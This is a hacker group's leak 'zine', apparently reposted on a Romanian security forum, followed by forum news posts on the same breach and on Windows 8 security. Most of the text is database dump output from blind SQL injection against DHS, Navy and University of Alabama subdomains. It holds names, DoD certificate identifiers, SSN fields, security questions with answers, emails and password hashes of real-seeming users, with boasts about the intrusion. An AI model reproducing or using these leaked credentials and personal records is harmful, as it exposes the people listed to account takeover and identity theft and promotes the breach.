SWM_QUEUE [7 columns] +-----------------------+----------+ | Column | Type | +-----------------------+----------+ | FILENAME | VARCHAR2 | | MEMBER_SSN | VARCHAR2 | | ORDERS_NUMBER | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | RECORD_PROCESSED_FLAG | VARCHAR2 | | SHIPMENT_NUMBER | NUMBER | | TTIMESTAMP | DATE | +-----------------------+----------+ Database: HHG_MGR Table: TOAD_PLAN_TABLE [36 columns] +-------------------+----------+ | Column | Type | +-------------------+----------+ | ACCESS_PREDICATES | VARCHAR2 | | BYTES | NUMBER | | CARDINALITY | NUMBER | | COST | NUMBER | | CPU_COST | NUMBER | | DEPTH | NUMBER | | DISTRIBUTION | VARCHAR2 | | FILTER_PREDICATES | VARCHAR2 | | ID | NUMBER | | IO_COST | NUMBER | | OBJECT_ALIAS | VARCHAR2 | | OBJECT_INSTANCE | NUMBER | | OBJECT_NAME | VARCHAR2 | | OBJECT_NODE | VARCHAR2 | | OBJECT_OWNER | VARCHAR2 | | OBJECT_TYPE | VARCHAR2 | | OPERATION | VARCHAR2 | | OPTIMIZER | VARCHAR2 | | OPTIOSS | | | OTHER | LONG | | OTHER_TAG | VARCHAR2 | | OTHER_XML | CLOB | | PARENT_ID | NUMBER | | PARTITION_ID | NUMBER | | PARTITION_START | VARCHAR2 | | PARTITION_STOP | VARCHAR2 | | PLAN_ID | NUMBER | | POSITION | NUMBER | | PROJECTION | VARCHAR2 | | QBLOCK_NAME | VARCHAR2 | | REMARKS | VARCHAR2 | | SEARCH_COLUMNS | NUMBER | | STATEMENT_ID | VARCHAR2 | | TEMP_SPACE | NUMBER | | TIME | NUMBER | | TIMESTAMP | DATE | +-------------------+----------+ Database: HHG_MGR Table: UNUSUAL_OVERSIZE_ITEMS [4 columns] +-------------------+----------+ | Column | Type | +-------------------+----------+ | DESCRIPTION | VARCHAR2 | | ITEM_NBR | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | SHIPMENT_NUMBER | NUMBER | +-------------------+----------+ Database: HHG_MGR Table: ZIP_TO_GBLOC [6 columns] +---------------+----------+ | Column | Type | +---------------+----------+ | CITY | VARCHAR2 | | COUNTY | VARCHAR2 | | GBLOC | VARCHAR2 | | LOCATION_CODE | VARCHAR2 | | REGION | VARCHAR2 | | ZIP_CODE | VARCHAR2 | +---------------+----------+ ====ACCOUNT INFO==== Database: HHG_MGR Table: ACCOUNT Ammount pulled: 20/1304 | ACTIVE_FLAG | ADMIN_FLAG | ASSIGNED_COUNSELOR_ID | CONFIRMATION_STRING | COUNSELOR_NOTES | DISTINGUISHED_NAME | DUPLICATE | LAST_ACTIVE_DATE | ORDERS_SERIAL_KEY | PASSWORD_CREATED_DATE | PASSWORD_HINT | PROC_PROCESSING_CENTER | SESSION_ID | SSN | SUBMIT_DATE | TOPS_SUBMIT_DATE | USER_PASSWORD | USERNAME | +-------------+------------+-----------------------+--------------------------------------------+-----------------+---------------------------------------------------------------------------------+---- | A | S | NULL | SON'S COMBINE NAME:KEVIN AND GREGGORY | NULL | cn=fulgham.octavia.l.1096466931,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 18-APR-03 | NULL | 03-JUN-08 | MICHIGAN | LKNQ | 00691FC30001 | 000-00-0001 | NULL | NULL | 81030BBC191983976F5052583F595CF8 | 4SON8UR@GMAIL.COM | | A | C | NULL | WHAT IS YOUR MOTHER'S MAIDEN NAME?:KEODARA | NULL | cn=lopez.aileen.k.1265005272,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 07-SEP-04 | NULL | 29-APR-08 | MOTHER'S MAIDEN NAME | NULL | 009203DF0001 | 000-00-0102 | NULL | NULL | ED10303C8867A67F086F9A1D74C94D4E | 77TWHY77 | | A | C | NULL | WHAT IS MY DOGS NAME?:JUNIOR | NULL | cn=lopez.irma.nmn.1231177333,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 02-SEP-04 | NULL | 27-MAY-08 | YOUR DOGS NAME | NULL | 003B021E0001 | 000-00-0103 | NULL | NULL | 8D6602A84EC821F9E114EADD49B70F52 | 818PEZ@EXCITE.COM | | A | C | NULL | WHATS MY CHILD'S NAME:ISAIAH | NULL | cn=dean.archelle.l.1231759898,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 03-SEP-04 | NULL | 04-JUN-08 | MY CHILD | LKNQ | 002F02DA0001 | 000-00-0104 | NULL | NULL | 305EC469D779257599B5DF7BC18F263A | A=ADDRAOS@YAHOO.COM | | A | S | NULL | SWM12345:SWM12345 | NULL | cn=clark.argraters.1232242937,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 04-AUG-04 | NULL | 05-MAY-08 | SWM12345 | NULL | 007355C80001 | 000-00-0105 | NULL | NULL | 875C0E3F9374D225BDB896A47984E71A | AARONSIEBENS | | A | S | NULL | WHAT IS YOUR DOG'S NAME?:SCOUTWILSON | NULL | cn=wilson.charles.edward.1129429964,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 28-MAY-04 | NULL | 19-JUN-08 | SWM12345 | NULL | 007270D50001 | 000-00-0216 | NULL | NULL | DDFA105959B07D80086F9A1D74C94D4E | AATLIM2012 | | A | S | NULL | WHAT IS MY MIDDLE NAME:NOTHING | NULL | cn=jones.claudine.1231119775,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 25-JUN-04 | NULL | 17-FEB-06 | JONESY44 | NULL | 009324E80001 | 000-00-2351 | NULL | NULL | 697BA73573BC9B6A7A75B26A3D55B56E | ABE2COPELAND | | A | S | NULL | WHO WILL WIN THE SERIES:YANKEES1 | NULL | cn=hancock.david.s.1230301863,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 09-SEP-04 | NULL | 29-APR-08 | WHO WILL WIN THE SERIES | NULL | t9gtxu9jm1.pkbCnAPNahmInAPNpMTIm | 000-00-3247 | NULL | NULL | 10999E2C53DE414FE9114E2604E52E51 | ABX2@COX.NET | | A | S | NULL | WHAT IS YOUR DOG'S NAME?:CHIABBA | NULL | cn=nuusolia.eseneiaso.1231722960,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 08-JUN-04 | NULL | 29-MAY-08 | NORMAL PLUS 11 | NULL | 002E03230001 | 000-00-4085 | NULL | NULL | 76E38E68A22BDB9089051C2406D1A310 | AC587447210 | | A | S | NULL | WHAT IS MY CAR NAME:JEEP CHEROKEE | NULL | cn=cook.joanne.h.1231669252,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 18-JUN-04 | NULL | 25-FEB-08 | NORMAL11 | NULL | 6wifxybmw1.pkbCnAPNahmInAPNpMTIm | 000-00-4492 | 12-MAR-02 | NULL | 370BF0B577E4EEF3086F9A1D74C94D4E | AC587848082 | | A | S | NULL | WHAT IS MY PASSWORD AT HOME:SMILE_44 | NULL | cn=sanborn.dorenda.l.1228609842,ou=usaf,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 02-SEP-04 | NULL | 27-MAR-08 | EARTHLINK | NULL | 009916F90001 | 000-00-5591 | NULL | NULL | A0704B6830EC5AF6EFF66614353E2184 | AD1MEDINA | | A | C | NULL | HOW OLD AM I:12345 | NULL | cn=eldert.ines.june.1179390600,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 08-DEC-03 | NULL | 21-APR-08 | WHAT IS MY DOGS NAME | NULL | 00A4037F0001 | 000-00-6166 | NULL | NULL | ED10303C8867A67F086F9A1D74C94D4E | AD554062933 | | A | C | NULL | WHAT IS MY SON NAME:BENJAMIN | NULL | cn=brown.sharon.a.1229856339,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 1MA-0R-02 | NULL | 05-MAY-08 | BA | NULL | 005E18160001 | 000-00-6528 | NULL | NULL | B918DEA7FC46BD0BA40C451BFAB2D133 | ADAIRWILLIAM | | A | S | NULL | WHAT IS YOUR DOG'S NAME:BABBETT | NULL | cn=watson.betty.s.1229845302,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 25-AUG-04 | NULL | 21-APR-08 | MCKENZIE | NULL | 002F10EE0001 | 000-00-6557 | NULL | NULL | DDFA105959B07D80086F9A1D74C94D4E | ADAM.MCLEOD | | A | C | NULL | WHAT IS MY SON'S NAME?:MARLON | NULL | cn=alvaran.jean.a.1174585772,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 10-SEP-04 | NULL | 02-APR-08 | MARLON123 | NULL | jp16ic75p1.pkbCnAPNahmInAPNpMTIm | 000-00-6666 | NULL | NULL | 55FC2C5D6EF9F373086F9A1D74C94D4E | ADAM.MOFFIT@GMAIL.COM | | A | S | NULL | FAVORITE LOCAL BAND:DEAD 50S | NULL | cn=sitz.robyn.m.1239515807,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 08-AUG-04 | NULL | 17-JUN-08 | DEAD50S! | NULL | 009915D80001 | 000-00-7009 | NULL | NULL | 3933CEBF87C39EE6E1C5AE40931B8F84 | ADAM.SCHWEGEL@NAVY.MIL | | A | S | NULL | WHAT IS YOUR DOG'S NAME?:BUDDY | NULL | cn=swanson.michael.l.1231322988,ou=usaf,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 06-AUG-04 | NULL | 30-MAY-08 | SWM12345 | DBNK | 009B01D50001 | 000-00-7346 | NULL | NULL | 820FCE53C3D61A8CE114EADD49B70F52 | ADAMCLEOOCHS@YAHOO.COM | | A | C | DS586608589 | swm12345 | NULL | cn=diaz.nancy.lee.1200127427,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 03-SEP-04 | NULL | 05-MAY-08 | swm12345 | LKNQ | 006862840001 | 000-00-7387 | 01-MAY-02 | NULL | E857D5584861528EBF44FBD95CD4293E | ADAMJOHNPAYNE@GMAIL.COM | | A | S | NULL | swm!1234:swm!1234 | NULL | cn=west.dawn.a.1229688312,ou=usn,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 09-MAR-05 | NULL | 21-MAY-08 | swm!1234 | NULL | NULL | 000-00-8548 | NULL | NULL | DDFA105959B07D80086F9A1D74C94D4E | ADENMOHAMED | | A | C | NULL | I AM:CHRIST33 | NULL | cn=murphy.kathleen.1228616318,ou=usaf,ou=pki,ou=dod,o=u.s. government,c=us | NULL | 10-FEB-04 | NULL | 08-APR-08 | RELIGION | ALNT | 009B6B250001 | 000-00-9503 | NULL | NULL | ED10303C8867A67F086F9A1D74C94D4E | ADRANSFIELD@COMCAST.NET | +-------------+------------+-----------------------+--------------------------------------------+-----------------+---------------------------------------------------------------------------------+---- DHS.GOV: ____ _ _ ____ ____ _____ __ | _ \| | | / ___| / ___|/ _ \ \ / / | | | | |_| \___ \| | _| | | \ \ / / | |_| | _ |___) | |_| | |_| |\ V / |____/|_| |_|____(_)____|\___/ \_/ Target: DHS.gov Vulnerable subdomain: twicinformation.tsa.dhs.gov Exploitable method: Blind SQL-Injection Database: Oracle /\______ __ /-~ ,^~ / __n / ,---x /_.-"L/__,\ /-".---.\_.-'/!" \ \ I KNOW KUNG-FOO! 0\/0___/ x' / ) | \.______.-'_.{__.-"_.^ DHG.GOV TIME! `x____,.-",-~( .-" _.-| ,^.-~ "\ WHERE IS THERE SECURITY NOW? __.-~_,-|/\/ `i / u.-~ .-{\/ .-^--. \/ v~ ,-^x.____}--r | KUNG-FOO'D BY DIGITALCORRUPTION! / /" | | _/_/ !_l_ o~_//) (_\\_~o ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ databases [3]: [*] CSMIG [*] CTXSYS [*] FAMP Database: CSMIG [12 tables] +-------------------+ | "CSM$CHARSETID" | | "CSM$COLUMNS" | | "CSM$CONSTRAINTS" | | "CSM$DICTUSERS" | | "CSM$ERROPS" | | "CSM$EXTABLES" | | "CSM$INDEXES" | | "CSM$LANGID" | | "CSM$PARAMETERS" | | "CSM$QUERY" | | "CSM$TABLES" | | "CSM$TRIGGERS" | +-------------------+ Database: CSMIG Table: "CSM$CHARSETID" [3 columns] +--------+--------+ | Column | Type | +--------+--------+ | "OBJ#" | NUMBER | | COUNT | NUMBER | | CSID | NUMBER | +--------+--------+ Database: CSMIG Table: "CSM$COLUMNS" [19 columns] +-----------+--------+ | Column | Type | +-----------+--------+ | "COL#" | NUMBER | | "DTY#" | NUMBER | | "FRM#" | NUMBER | | "INTCOL#" | NUMBER | | "OBJ#" | NUMBER | | "USR#" | NUMBER | | BROWID | ROWID | | CHRSIZ | NUMBER | | CNVCNT | NUMBER | | CNVERR | NUMBER | | CNVFAI | NUMBER | | CNVLOS | NUMBER | | CNVSUC | NUMBER | | CNVTRN | NUMBER | | ERRCNT | NUMBER | | MAXSIZ | NUMBER | | NULCNT | NUMBER | | NULROWS | | | SIZERR | NUMBER | +-----------+--------+ Database: CSMIG Table: "CSM$CONSTRAINTS" [3 columns] +--------+--------+ | Column | Type | +--------+--------+ | "CON#" | NUMBER | | LVL | NUMBER | | RID | NUMBER | +--------+--------+ Database: CSMIG Table: "CSM$DICTUSERS" [2 columns] +----------+----------+ | Column | Type | +----------+----------+ | "USER#" | NUMBER | | USERNAME | VARCHAR2 | +----------+----------+ Database: CSMIG Table: "CSM$ERROPS" [0 columns] Database: CSMIG Table: "CSM$EXTABLES" [8 columns] +-----------+--------+ | Column | Type | +-----------+--------+ | "COL#" | NUMBER | | "DTY#" | NUMBER | | "FRM#" | NUMBER | | "INTCOL#" | NUMBER | | "OBJ#" | NUMBER | | "SCNCOL#" | NUMBER | | "USR#" | NUMBER | | PROPERTY | NUMBER | +-----------+--------+ Database: CSMIG Table: "CSM$INDEXES" [1 column] +--------+--------+ | Column | Type | +--------+--------+ | "OBJ#" | NUMBER | +--------+--------+ Database: CSMIG Table: "CSM$LANGID" [3 columns] +--------+--------+ | Column | Type | +--------+--------+ | "OBJ#" | NUMBER | | COUNT | NUMBER | | LANGID | NUMBER | +--------+--------+ Database: CSMIG Table: "CSM$PARAMETERS" [2 columns] +--------+----------+ | Column | Type | +--------+----------+ | NAME | VARCHAR2 | | VALUE | VARCHAR2 | +--------+----------+ Database: CSMIG Table: "CSM$QUERY" [1 column] +--------+------+ | Column | Type | +--------+------+ | VALUE | CLOB | +--------+------+ Database: CSMIG Table: "CSM$TABLES" [27 columns] +-------------+--------+ | Column | Type | +-------------+--------+ | "OBJ#" | NUMBER | | "USR#" | NUMBER | | ADDSIZE | NUMBER | | BLOCKS | NUMBER | | CNVCOLS | NUMBER | | CNVEND | DATE | | CNVROWS | NUMBER | | CNVSTART | DATE | | FILES | NUMBER | | LASTUPD | ROWID | | LASTUPDLG | ROWID | | LNGCONV | NUMBER | | LNGEND | DATE | | LNGROWS | NUMBER | | LNGSTART | DATE | | MAXROWID | ROWID | | MINROWID | ROWID | | PROPERTY | NUMBER | | PSTCVROWS | NUMBER | | PSTCVROWSLG | NUMBER | | SCNCOLS | NUMBER | | SCNEND | DATE | | SCNROWS | NUMBER | | SCNSTART | DATE | | UNNESTED | NUMBER | | WHO | NUMBER | | WHOCONV | NUMBER | +-------------+--------+ Database: CSMIG Table: "CSM$TRIGGERS" [1 column] +--------+--------+ | Column | Type | +--------+--------+ | "OBJ#" | NUMBER | +--------+--------+ ====================== Database: CTXSYS [3 tables] +-----------------------+ | "DR$NUMBER_SEQUENCE" | | "DR$OBJECT_ATTRIBUTE" | | "DR$POLICY_TAB" | +-----------------------+ Database: CTXSYS Table: "DR$NUMBER_SEQUENCE" [1 column] +--------+--------+ | Column | Type | +--------+--------+ | NUM | NUMBER | +--------+--------+ Database: CTXSYS Table: "DR$OBJECT_ATTRIBUTE" [14 columns] +---------------+----------+ | Column | Type | +---------------+----------+ | "OAT\VAL_MIN" | | | OAT_ATT_ID | NUMBER | | OAT_CLA_ID | NUMBER | | OAT_DATATYPE | CHAR | | OAT_DEFAULT | VARCHAR2 | | OAT_DESC | VARCHAR2 | | OAT_ID | NUMBER | | OAT_LOV | CHAR | | OAT_NAME | VARCHAR2 | | OAT_OBJ_ID | NUMBER | | OAT_REQUIRED | CHAR | | OAT_STATIC | CHAR | | OAT_SYSTEM | CHAR | | OAT_VAL_MAX | NUMBER | +---------------+----------+ Database: CTXSYS Table: "DR$POLICY_TAB" [2 columns] +-------------+------+ | Column | Type | +-------------+------+ | PLT_LANGCOL | CHAR | | PLT_POLICY | CHAR | +-------------+------+ ====================== Database: FAMP [1 table] +------------------+ | LMCO_WF_SECURITY | +------------------+ Database: FAMP Table: LMCO_WF_SECURITY [4 columns] +----------------+------+ | Column | Type | +----------------+------+ | AX_APPLICATION | CHAR | | AX_COMPNY | CHAR | | AX_NTID | CHAR | | AX_USERNM | CHAR | +----------------+------+ UA.EDU: _ _ _ _____ ____ _ _ | | | | / \ | ____| _ \| | | | | | | |/ _ \ | _| | | | | | | | | |_| / ___ \ _| |___| |_| | |_| | \___/_/ \_(_)_____|____/ \___/ Target: ua.edu |____________________________________________________| | __ __ ____ ___ || ____ ____ _ __ | || |__ |--|_| || |_| |||_|**|*|__|+|+||___| || | | ||==|^^||--| |=||=| |=*=||| |~~|~| |=|=|| | |~||==| | || |##|| | | || | |JRO|||-| | |==|+|+||-|-|~||__| | ||__|__||__|_|_||_|_|___|||_|__|_|__|_|_||_|_|_||__|_| ||_______________________||__________________________| | _____________________ || __ __ _ __ _ | ||=|=|=|=|=|=|=|=|=|=|=| __..\/ | |_| ||#||==| / /| || | | | | | | | | | | |/\ \ \\|++|=| || ||==| / / | ||_|_|_|_|_|_|_|_|_|_|_/_/\_.___\__|_|__||_||__|/_/__| |____________________ /\~()/()~//\ __________________| | __ __ _ _ \_ (_ . _/ _ _ _____| HMM! WHICH UNIVERSITY SHOULD WE OWN NOW? ||~~|_|..|__| || |_ _ \ //\\ / |=|_ /) |___| | | | ||--|+|^^|==|1||2| | |__/\ __ /\__| |(\/((\ +|+|=|=|=| ||__|_|__|__|_||_|_| / \ \ / / \_|_\___/|_|_|_|_|_| |_________________ _/ \/\/\/ \_ / /__________| FOUND ONE! UA.EDU HAS SOME JUICY INFORMATION! | _____ _ __ |/ \../ \/ / __ ___| ||_____|_| |_|##|_|| | \/ __\ /=|_|++|_|-||| ||______||=|#|--| |\ \ o \_____/ |~| | | ||| ||______||_|_|__|_|_\ \ o | |_|_|__|_|__|_|_||| |_________ __________\___\_______|____________ ______|SHOULD WE PROCEED? |__ _ / ________ ______ /| _ _ _| |\ \ |=|/ // /| // / / / | / ||%|%|%| | \/\ |*/ .//____// // /__/__/ (_) / ||=|=|=| __| \/\|/ /(____|/ // / /||~|~|~|__ |___\_/ /________// ________ / / ||_|_|_| DATABASE FOUND! DUMPING DATASBASE NOW! |___ / (|________/ |\_______\ / /| |______| / \|________) / / | | ================================================================= available databases [59]: [*] alauth [*] alm [*] ARCHIVISTSTK [*] ArchivistsTKTest [*] ATKBackup120711_5pm [*] backup [*] bbq [*] blogdb [*] CSV_DB [*] drupal-acftb [*] drupal-alm [*] drupal-highschool [*] drupal-highschool-092509 [*] drupal-highschool-111209 [*] drupal-intranet [*] drupal-intranet-092509 [*] drupal-intranet-111209 [*] drupal-www [*] drupal-www-111209 [*] drupal-www-dev [*] drupal-www-dev-111209 [*] event_signup [*] Gorgas_Videos [*] Hoole_FindingAids [*] InfoLitQuiz [*] information_schema [*] lib_databases [*] lib_hours [*] Lib_Intranet [*] libgame [*] libstats [*] libstats-fall2008 [*] libstats-summer2008 [*] libstats_fall2009 [*] libstats_fall2010 [*] libstats_spring2009 [*] libweb1_dbs [*] mrbs [*] mrbstest [*] mysql [*] nhprc [*] OLD_blogdb [*] randd [*] refstats [*] selmrbs [*] smcstats [*] staffdirectory [*] survey [*] test [*] thezone [*] timeclock [*] videos [*] weblab [*] wikidb [*] wordpress [*] wordpress-mu [*] wordpress-mu-public [*] wordpress_mu_public_backup_03032011 [*] wp-public-backup-for-312-update ================================================================= ================================================================= Database: blogdb [11 tables] +---------------------------+ | mclure_commentmeta | | mclure_comments | | mclure_links | | mclure_options | | mclure_postmeta | | mclure_posts | | mclure_term_relationships | | mclure_term_taxonomy | | mclure_terms | | mclure_usermeta | | mclure_users | +---------------------------+ ================================================================= ================================================================= Database: blogdb Table: mclure_users [10 columns] +---------------------+---------------------+ | Column | Type | +---------------------+---------------------+ | display_name | varchar(250) | | ID | bigint(20) unsigned | | user_activation_key | varchar(60) | | user_email | varchar(100) | | user_login | varchar(60) | | user_nicename | varchar(50) | | user_pass | varchar(64) | | user_registered | datetime | | user_status | int(11) | | user_url | varchar(100) | +---------------------+---------------------+ ================================================================= ================================================================= Database: blogdb Table: mclure_users [2 entries] +----+------------------------+------------+------------------------------------+ | ID | user_email | user_login | user_pass | +----+------------------------+------------+------------------------------------+ | 1 | webdev@bama.ua.edu | admin | $P$BwGN0z5Y7dMs8UTHjyH9hiBtztJTi.1 | | 6 | library.systems@ua.edu | libsys | $P$BHc8ZXg1YEOz479MqTgIhwMT6rRzOm1 | +----+------------------------+------------+------------------------------------+ ================================================================= ================================================================= Database: mysql [18 tables] +---------------------------+ | columns_priv | | db | | func | | help_category | | help_keyword | | help_relation | | help_topic | | host | | proc | | procs_priv | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | | user | | user_info | +---------------------------+ ================================================================= ================================================================= Database: mysql Table: user [37 columns] +-----------------------+-----------------------------------+ | Column | Type | +-----------------------+-----------------------------------+ | Alter_priv | enum('N','Y') | | Alter_routine_priv | enum('N','Y') | | Create_priv | enum('N','Y') | | Create_routine_priv | enum('N','Y') | | Create_tmp_table_priv | enum('N','Y') | | Create_user_priv | enum('N','Y') | | Create_view_priv | enum('N','Y') | | Delete_priv | enum('N','Y') | | Drop_priv | enum('N','Y') | | Execute_priv | enum('N','Y') | | File_priv | enum('N','Y') | | Grant_priv | enum('N','Y') | | Host | char(60) | | Index_priv | enum('N','Y') | | Insert_priv | enum('N','Y') | | Lock_tables_priv | enum('N','Y') | | max_connections | int(11) unsigned | | max_questions | int(11) unsigned | | max_updates | int(11) unsigned | | max_user_connections | int(11) unsigned | | Password | char(41) | | Process_priv | enum('N','Y') | | References_priv | enum('N','Y') | | Reload_priv | enum('N','Y') | | Repl_client_priv | enum('N','Y') | | Repl_slave_priv | enum('N','Y') | | Select_priv | enum('N','Y') | | Show_db_priv | enum('N','Y') | | Show_view_priv | enum('N','Y') | | Shutdown_priv | enum('N','Y') | | ssl_cipher | blob | | ssl_type | enum('','ANY','X509','SPECIFIED') | | Super_priv | enum('N','Y') | | Update_priv | enum('N','Y') | | User | char(16) | | x509_issuer | blob | | x509_subject | blob | +-----------------------+-----------------------------------+ ================================================================= ================================================================= Database: mysql Table: user [49 entries] +-----------------------------+-------------------------------------------+----------------+ | Host | Password | User | +-----------------------------+-------------------------------------------+----------------+ | % | *42085790413E194A45ED1CBCC9CB8D4B3EF2EA3D | _alauth | | % | None | hoole | | % | None | metadata | | 130.160.140.0/255.255.254.0 | None | videos | | 130.160.140.132 | *88E08A2EE7DB5F8604616F0BE6B6DEEB9467ABF0 | jtillis | | libweb1.lib.ua.edu | *A88C335072B994677457ACE39AFC5D05CEAA6C5F | None | | libweb1.lib.ua.edu | *D44B3EC263F2D62ED17B04801ECCB000F954AB80 | root | | localhost | *D1FFD8F4C94CDFC39795EB5DCBCFC571F152BD93 | None | | localhost | *225DF22F816B86208F0445DF2311292C1F98B665 | HoolFindAid | | localhost | *C15B44C650AB9630DB16AD782F9D19EEB87F215D | _alauth | | localhost | *45F9B5A3417AA96BF37A9D8F97197EBA501D0918 | alm | | localhost | *B0053F607C9BFBF0A6775C3DFBBA647F4C416B88 | alm_events | | localhost | *A7509FE385B684E6C1A1AED01288D80CCA7419DE | blogdb | | localhost | *DCB433CF5950534CE7E908622049C25698318249 | databases_a | | localhost | *5AD70578202705F378E686C879D61B1077037498 | databases_u | | localhost | *7480B41B36DD2A912226F06EF9F70B1017D17436 | db_dhill | | localhost | *FB96B0B59E8888D7A1380C20EB28AA97650B43B6 | db_lewis062 | | localhost | *DE734092E6E6ABBA5279C5CC178D254370D9EB30 | db_mpatrick | | localhost | *DE734092E6E6ABBA5279C5CC178D254370D9EB30 | drupalacftb | | localhost | *84F90310487185B213EC46DEA53F9CDE3FA2124C | drupalalm | | localhost | *C0E18229096B925DE7A5637EC9628F289258E40A | drupalhs | | localhost | *DFAA26BA2CB170023362465BB13000E5F0F53FED | drupalintra | | localhost | *A082F81E7F76213A3D5BF840A062A4C412679453 | drupalwww | | localhost | *56B6EAD890E5B05E3CC6C615080079C0FB5DE791 | drupalwww-read | | localhost | *9932B1970B0AF7E27241DD33B744B7B185247EE8 | fundraiser | | localhost | *79C821F9EAE10B0B32963C9BF0B92EA9C8AA8FE8 | infolit | | localhost | *1C9BA4BACD386B1B3DB157596D7BDEFE07DBF28A | libgame | | localhost | *B44FCC110162C8865C0D23D8DA8271D8F46E6A7E | libintranet | | localhost | *4432CFD281B6728C842A2355D12AE475AAA8CEEC | libstatsu | | localhost | *5FB1B405C6AB0BAF56CA0CDC28346D8CA2A26B22 | mrbs | | localhost | *69E1CA1574C4D49F6CA885C97643AE5752464C76 | mrbs_viewer | | localhost | *347C4DD22AD3FCFDBA27A06618F25193D37F1B63 | mrbstest | | localhost | *FD7E4BBD242CFA10B3FDAA56CA7B94342C5C5AA0 | musiclib | | localhost | *3FD973352F241C483C20E82E7CA585DEBE1E6634 | nhprc | | localhost | *A4A1EF3BC857C72A60FD9F46E308864D90F4B7A9 | randd | | localhost | *A4A1EF3BC857C72A60FD9F46E308864D90F4B7A9 | refstats | | localhost | *8DD6F48097EE9556174491C0E134B5EC8B27D6D8 | root | | localhost | *03516F1D34186E5E7D494D90FEC4162789AA1356 | selmrbs | | localhost | *A5EF62914245BD345C4470A0D43EE7E008AD9C40 | sjturner1 | | localhost | *9A154FBFD29CBFA9039B6FBB42368A59EA8EB878 | smcstats | | localhost | *66D8702E3166514F3077116B25C4A16F3FE12C9A | staffdir | | localhost | *0ABAB21EE59FEA921D859CEA9D2DC643B2849B5A | survey_user | | localhost | *F094216EB8504680E6BB34783FC409A7407C4373 | timeclock | | localhost | *A5892368AE83685440A1E27D012306B073BDF5B7 | videos | | localhost | *F5C1F6CD69B494439CBBFD9782F50FA2A973AC0C | weblab | | localhost | *F23127EE15F63C55C154DDB0467C9D863B99061B | wikidb | | localhost | *98AD3EFE7D729B67F379E125C0F12E53E0037D24 | wordpress | | localhost | *26ED4440AAEB5C1EEAAA83FBEA0985AE0D35626D | wpmu122 | | localhost | *0D0A4670814AE3D58163A3D831901A10E50B5F78 | wpmupub | +-----------------------------+-------------------------------------------+----------------+ ================================================================= .-------. .' `. .' `. |.-. .-. .-. .-.| |`-. | | | |-'| |`-' ' `-' ' | ' ' `. .'.''. .''. `._______.' __ __ | | .----/ \ / \---. | | | | | | |____ | | | |`--''`--'| / | \_ ,----.| \ O | O _ | | | \ | ---'| '._/ \_.| `| | | | \.---'| | | `- ,| | `---'| | : | | | | | '._.-- ; | | | . .: ` / '-' | '....' `.______/ | | | | `----------------' || ||fsr || || _.---'' '-, ,-' ''---._ / __..' '..__ \ WELL FOLKS, THAT WAS THE END OF OUR ZINE. SEE YOU NEXT TIME! [url=http://Digital-corruption.org]Digital-Corruption[/url] [url]http://pastebin.com/raw.php?i=VtTwtC4S[/url] [url=http://thehackernews.com/]The Hacker News [ THN ][/url]

June 23, 2012

Windows 8 will be challenge for Malware writers

Wubi replied to Wubi's topic in Stiri securitate

Am testat si eu putin Windows 8, si acest nou "App Container" este chiar o idee buna. Ii ofera sistemului de operare un mod de a lua decizii mai bune asupra actiunilor sau aplicatiilor ce ruleaza.

Department of Homeland Security and U.S Navy hacked

Wubi posted a topic in Stiri securitate

Department of Homeland Security and U.S Navy hacked Department of Homeland Security and U.S Navy websites once again at Major Risk. This time hacking group called "Digital-corruption" hacked into subdomains of both sites and leak database info on pastebin. In its announcement on the pastebin.com website, the group said it has leaked database from https://www.smartwebmove.navsup.navy.mil/ and twicinformation.tsa.dhs.gov using Blind SQL-Injection method. The Database include Usernames, Passwords, Email ID's, Security Questions - Answers of all users. Hackers shout: say("#FreeTriCk #FreeMLT #FreePhantom"); say("Knowledge is power!"); say("NAVY.MIL, care to share some of your staff information?"); Department of Homeland Security and U.S Navy websites are hacked lots of times in past one year by Different hackers from all over world. Sursa

June 23, 2012

Windows 8 will be challenge for Malware writers

Wubi posted a topic in Stiri securitate

Windows 8 will be challenge for Malware writers Windows+8+will+be+challenge+for+Malware+writers Microsoft™s security researcher believe that upcoming operating system, Windows 8 is a step forward in security and Windows 8 will be far better at protecting against malware than it’s predecessors. Chris Valasek, a senior security research scientist at development testing firm Coverity, began examining the security features of Windows 8 last autumn, before the consumer previews of the upcoming revamp of the new Microsoft OS came out. One major change between Windows 7 and 8 is the addition of more exploit-mitigation technologies, however. Windows Memory Managers (specifically the Windows Heap Manager and Windows Kernel Pool Allocator) are designed to make it far harder for attackers to exploit buffer-overflow vulnerabilities and the like to push malware onto vulnerable systems.The "security sandbox" for applications for Windows 8 will also be a great step forward. "These new Windows 8 Apps will be contained by a much more restrictive security sandbox, which is a mechanism to prevent programs from performing certain actions," Valasek explains. "This new App Container provides the operating system with a way to make more fine-grained decisions on what actions certain applications can perform, instead of relying on the more broad ‘Integrity Levels’ that debuted in Windows Vista/7. Windows 8 also comes with a new version of Internet Explorer, Microsoft's browser software. Internet Explorer 10 will come with a mode that disables support for third-party plug-ins such as Flash and Java. Sursa

AutoIT = Virus ?

Wubi replied to poisonel's topic in Off-topic

